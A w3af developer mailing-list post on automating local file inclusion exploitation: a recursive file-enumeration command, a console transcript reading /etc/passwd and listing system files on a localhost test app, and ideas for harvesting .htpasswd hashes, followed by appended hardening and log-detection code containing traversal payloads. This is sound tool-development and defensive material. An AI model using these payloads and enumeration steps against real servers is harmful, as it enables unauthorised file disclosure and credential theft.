List,

    Last Friday at the office one of the guys found a vulnerability in
a web application; the vulnerability was the classic
index.php?filename=/etc/passwd that lets you read the content of any
file, given that you know its location and Apache has the correct
permissions to read it.

    After that, I slightly modified the attack.localFileReader plugin
from w3af in order to make it work as expected, and during the last
hour I've been playing with a nice idea that I wanted to share. The
idea is pretty simple, but I haven't seen it implemented in any other
software. First of all, a small introduction to
attack.localFileReader: basically you only have one command, "cat",
which allows you to print the content of a file using a local file
inclusion/read vulnerability. Using that, I wanted to obtain from the
remote web server a list of files that may contain important
information for me as a penetration tester... so basically I added
the "list" command, which operates as follows:

- cat a non-existent file, and save the response
- cat a lot of common files, and compare each response with the
non-existent-file response; if they differ, then the file exists
- for all the files that I just found, parse them and try to find
references to other files. For example, if I find that
/etc/init.d/apache2 exists and parse it, I would obtain a list with
(for example) /bin/sh, /usr/sbin/apache2ctl, /usr/sbin/htcacheclean,
etc.
- for every reference found in any of the previous files, run the
process again.

    At first I thought that this would give me only a few files beyond
the ones I already knew were there, and that I would hit a dead end
after calling the method recursively one or two times. But I was
mistaken, and I'm happy to say it =) Here are some results:

Recursion level 0, 15 unique files.
Recursion level 1, 37 unique files.
Recursion level 2, 60 unique files.
Recursion level 3, 1162 unique files.
Recursion level 4, 2903 unique files.

    I wanted to test it with a recursion level greater than 4, but it
took too much time. For those who are curious, see the attached file
for a run of the attack plugin.

    After finishing my implementation, I started to wonder... what
else could be achieved (in an automated fashion of course) using a
local file read vulnerability? Here are some ideas that I still have
to add to the plugin:

    - OS identification: an easy one, because you could just "cat
/etc/debian_version", and if it's there, you know it's Debian and the
content of the file tells you what version it is running (some
problems with Ubuntu may arise).

    - .htaccess and .htpasswd files that may contain weak hashes: for
every directory that the list command finds, we could request
/directory/.htaccess and /directory/.htpasswd. Too many requests?
Maybe request .ht* only for directories that contain "www" or "htdocs"
or something like that?

    Can you think of other interesting techniques that can be
applied to this vulnerability in order to gain more information about
the target server? Thanks for your input!

Cheers,
-- 
Andres Riancho
http://w3af.sourceforge.net/
Web Application Attack and Audit Framework
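
Added here as an example, not code from the post, from w3af or from the vulnerable application: a Python stand-in for the index.php?filename= handler described above, with the bug beside a hardened version that allowlists page names and confines the resolved path to the document root. The document root, the page allowlist and the "outside" file are all constructed for the demo.

```python
import os
import tempfile
from pathlib import Path

ALLOWED_PAGES = {"index.html", "about.html"}  # constructed allowlist of pages the app serves

def read_page_vulnerable(docroot, filename):
    # The bug from the post: os.path.join discards docroot when filename is
    # absolute, and ".." segments walk out of it, so any readable file is served.
    return Path(os.path.join(docroot, filename)).read_text()

def read_page_hardened(docroot, filename):
    root = Path(docroot).resolve()
    # Allowlist first: the application knows exactly which pages it serves.
    if filename not in ALLOWED_PAGES:
        raise PermissionError(f"not an allowed page: {filename!r}")
    # Confinement second, as defence in depth: resolve symlinks and ".." and
    # require the result to still sit below the document root.
    target = (root / filename).resolve()
    if root not in target.parents:
        raise PermissionError(f"path escapes document root: {filename!r}")
    return target.read_text()

def demo():
    """Build a throwaway document root and one file outside it (constructed
    stand-ins for the web tree and /etc/passwd), then try both readers on a
    legitimate name, an absolute path and a traversal sequence."""
    with tempfile.TemporaryDirectory() as tmp:
        docroot = Path(tmp) / "www"
        docroot.mkdir()
        (docroot / "index.html").write_text("<h1>hello</h1>")
        outside = Path(tmp) / "passwd"
        outside.write_text("root:x:0:0:")
        probes = {"legit": "index.html", "absolute": str(outside), "traversal": "../passwd"}
        results = {}
        for label, name in probes.items():
            leaked = read_page_vulnerable(docroot, name)
            try:
                served = read_page_hardened(docroot, name)
            except PermissionError as exc:
                served = f"denied: {exc}"
            results[label] = (leaked, served)
        return results

if __name__ == "__main__":
    for label, (leaked, served) in demo().items():
        print(f"{label:9s} vulnerable -> {leaked!r:20s} hardened -> {served}")
```

The allowlist alone already stops both probes; the realpath confinement is kept so that a later change to the allowlist (say, loading names from a config file) cannot silently reopen the hole.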

w3af>>> plugins
w3af/plugins>>> audit localFileInclude
w3af/plugins>>> output console,textFile
w3af/plugins>>> output config textFile
w3af/plugins/output/config:textFile>>> set fileName output-w3af.txt
w3af/plugins/output/config:textFile>>> set verbose True
w3af/plugins/output/config:textFile>>> back
w3af/plugins>>> discovery webSpider
w3af/plugins>>> discovery config webSpider
w3af/plugins/discovery/config:webSpider>>> set onlyForward True
w3af/plugins/discovery/config:webSpider>>> back
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target 
http://localhost/w3af/audit/local_file_inclusion/index.html
w3af/config:target>>> back
w3af>>> start
Auto-enabling plugin: discovery.allowedMethods
New URL found by webSpider plugin: 
http://localhost/w3af/audit/local_file_inclusion/false_positive.php
New URL found by webSpider plugin: 
http://localhost/w3af/audit/local_file_inclusion/trivial_lfi.php
New URL found by webSpider plugin: 
http://localhost/w3af/audit/local_file_inclusion/lfi_2.php
New URL found by webSpider plugin: 
http://localhost/w3af/audit/local_file_inclusion/lfi_1.php
New URL found by webSpider plugin: 
http://localhost/w3af/audit/local_file_inclusion/
Found 6 URLs and 6 different points of injection.
The list of URLs is:
- http://localhost/w3af/audit/local_file_inclusion/false_positive.php
- http://localhost/w3af/audit/local_file_inclusion/trivial_lfi.php
- http://localhost/w3af/audit/local_file_inclusion/lfi_2.php
- http://localhost/w3af/audit/local_file_inclusion/lfi_1.php
- http://localhost/w3af/audit/local_file_inclusion/
- http://localhost/w3af/audit/local_file_inclusion/index.html
The list of fuzzable requests is:
- http://localhost/w3af/audit/local_file_inclusion/index.html | Method: GET
- http://localhost/w3af/audit/local_file_inclusion/false_positive.php | Method: 
GET | Parameters: (file)
- http://localhost/w3af/audit/local_file_inclusion/trivial_lfi.php | Method: 
GET | Parameters: (file)
- http://localhost/w3af/audit/local_file_inclusion/lfi_2.php | Method: GET | 
Parameters: (file)
- http://localhost/w3af/audit/local_file_inclusion/lfi_1.php | Method: GET | 
Parameters: (file)
- http://localhost/w3af/audit/local_file_inclusion/ | Method: GET
Starting localFileInclude plugin execution.
File fragments have been found. The following is a list of file fragments that 
were returned by the web application while testing for local file inclusion: 
- "root:x:0:0:" 
- "daemon:x:1:1:" 
- ":/bin/bash" 
- ":/bin/sh" 
". This is just an informational message, which might be related to a 
vulnerability and was found on response with id 74.
Local File Inclusion was found at: 
"http://localhost/w3af/audit/local_file_inclusion/trivial_lfi.php";, using HTTP 
method GET. The sent data was: "file=%2Fetc%2Fpasswd". The vulnerability was 
found in the request with id 74.
Finished scanning process.
w3af>>> exploit
w3af/exploit>>> exploit localFileReader
localFileReader exploit plugin is starting.
The vulnerability was found using method GET, but POST is being used during 
this exploit.
Vulnerability successfully exploited. This is a list of available shells and 
proxies:
- [0] <shell object (rsystem: "linux")>
Please use the interact command to interact with the shell objects.
w3af/exploit>>> interact 0
Execute "endInteraction" to get out of the remote shell.Commands typed in this 
menu will be runned on the remote web server.
w3af/exploit/localFileReader-0>>> list
/etc/apache2/httpd.conf
/etc/bash.bashrc
/etc/crontab
/etc/environment
/etc/fstab
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/inetd.conf
/etc/init.d/apache2
/etc/motd
/etc/passwd
/etc/shadow                             Permission denied.
/etc/sudoers                            Permission denied.
/root/.bash_history                     Permission denied.
w3af/exploit/localFileReader-0>>> list -r 1
/bin/bash
/bin/false
/bin/sh
/bin/sync
/etc/apache2/envvars
/etc/apache2/httpd.conf
/etc/bash.bashrc
/etc/bash_completion
/etc/crontab
/etc/default/apache2
/etc/default/rcS
/etc/environment
/etc/fstab
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/inetd.conf
/etc/init.d/apache2
/etc/motd
/etc/passwd
/lib/lsb/init-functions
/usr/bin/python
/usr/bin/sudo
/usr/lib/command-not-found
/usr/sbin/anacron
/usr/sbin/apache2
/usr/sbin/apache2ctl
/usr/sbin/htcacheclean
/usr/sbin/nologin
/dev/scd0                               Permission denied.
/dev/sda1                               Permission denied.
/dev/sda5                               Permission denied.
/etc/shadow                             Permission denied.
/etc/sudoers                            Permission denied.
/root/.bash_history                     Permission denied.
/var/lib/gdm                            Permission denied.
/var/lib/tor                            Permission denied.
w3af/exploit/localFileReader-0>>> list -r 2
/bin/bash
/bin/dash
/bin/echo
/bin/false
/bin/pidof
/bin/sh
/bin/sync
/etc/apache2/envvars
/etc/apache2/httpd.conf
/etc/bash.bashrc
/etc/bash_completion
/etc/crontab
/etc/debian_version
/etc/default/apache2
/etc/default/rcS
/etc/environment
/etc/fstab
/etc/group
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/inetd.conf
/etc/init.d/apache2
/etc/lsb-base-logging.sh
/etc/motd
/etc/network/interfaces
/etc/passwd
/etc/shells
/etc/ssh/ssh_config
/etc/ssl/openssl.cnf
/lib/ld-linux.so.2
/lib/lsb/init-functions
/proc/filesystems
/sbin/lsmod
/sbin/modinfo
/sbin/start-stop-daemon
/usr/bin/expr
/usr/bin/python
/usr/bin/sudo
/usr/bin/tput
/usr/bin/vi
/usr/lib/command-not-found
/usr/lib/sudo/sudo_noexec.so
/usr/sbin/anacron
/usr/sbin/apache2
/usr/sbin/apache2ctl
/usr/sbin/htcacheclean
/usr/sbin/nologin
/usr/share/dict/words
/var/lib/dpkg/status
/var/run/apache2.pid
/dev/scd0                               Permission denied.
/dev/sda1                               Permission denied.
/dev/sda5                               Permission denied.
/etc/shadow                             Permission denied.
/etc/sudoers                            Permission denied.
/etc/wvdial.conf                        Permission denied.
/root/.bash_history                     Permission denied.
/var/lib/gdm                            Permission denied.
/var/lib/tor                            Permission denied.
w3af/exploit/localFileReader-0>>> endInteraction
w3af/exploit>>> exit
w3af/exploit>>> 
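
Added example, not part of the message or its attached transcript: the scan above sent file=%2Fetc%2Fpasswd and the "list" command then probed dozens of distinct paths, which leaves a recognisable signature in the web server's access log. This Python checker runs over constructed Apache-style log lines, flags parameter values that decode to an absolute path, a ".." segment or an embedded NUL, and reports clients whose count of distinct flagged paths reaches a (constructed) threshold, which is the enumeration pattern rather than a single probe.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access log lines (Apache combined format, minus referer/agent).
# Line 3 carries the exact payload the scan in the post sent; lines 4-6 mimic
# the burst of distinct paths that the "list" command produces from one client.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2009:10:01:01 -0300] "GET /index.html HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2009:10:01:02 -0300] "GET /trivial_lfi.php?file=about.html HTTP/1.1" 200 300
10.0.0.9 - - [12/Mar/2009:10:02:01 -0300] "GET /trivial_lfi.php?file=%2Fetc%2Fpasswd HTTP/1.1" 200 1400
10.0.0.9 - - [12/Mar/2009:10:02:02 -0300] "GET /trivial_lfi.php?file=/etc/hosts HTTP/1.1" 200 220
10.0.0.9 - - [12/Mar/2009:10:02:02 -0300] "GET /trivial_lfi.php?file=..%2F..%2Fetc%2Finit.d%2Fapache2 HTTP/1.1" 200 3100
10.0.0.9 - - [12/Mar/2009:10:02:03 -0300] "GET /trivial_lfi.php?file=%2Fetc%2Fshadow HTTP/1.1" 200 95
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})')
# Absolute path, a ".." segment, or an embedded NUL (used to cut off appended suffixes).
PATH_LIKE = re.compile(r'^/|(^|/)\.\.(/|$)|\x00')

def suspicious_values(url):
    """Query parameters whose decoded value points at a file outside the web tree."""
    hits = []
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; a second pass catches double encoding
        if PATH_LIKE.search(decoded):
            hits.append((key, decoded))
    return hits

def scan_log(text, burst_threshold=3):
    """Return (per-request hits, clients whose distinct-path count reached the
    threshold, i.e. an automated enumeration rather than a single probe)."""
    hits = []
    paths_by_client = defaultdict(set)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for key, value in suspicious_values(m["url"]):
            hits.append((m["ip"], m["status"], key, value))
            paths_by_client[m["ip"]].add(value)
    enumerators = sorted(ip for ip, paths in paths_by_client.items()
                         if len(paths) >= burst_threshold)
    return hits, enumerators
```

One caveat from the transcript itself: localFileReader switched to POST during exploitation, and POST bodies are not in the access log, so a query-string check like this only sees the discovery phase; catching the enumeration burst needs request-body inspection at the server or proxy.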

------------------------------------------------------------------------------
_______________________________________________
W3af-develop mailing list
W3af-develop@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/w3af-develop
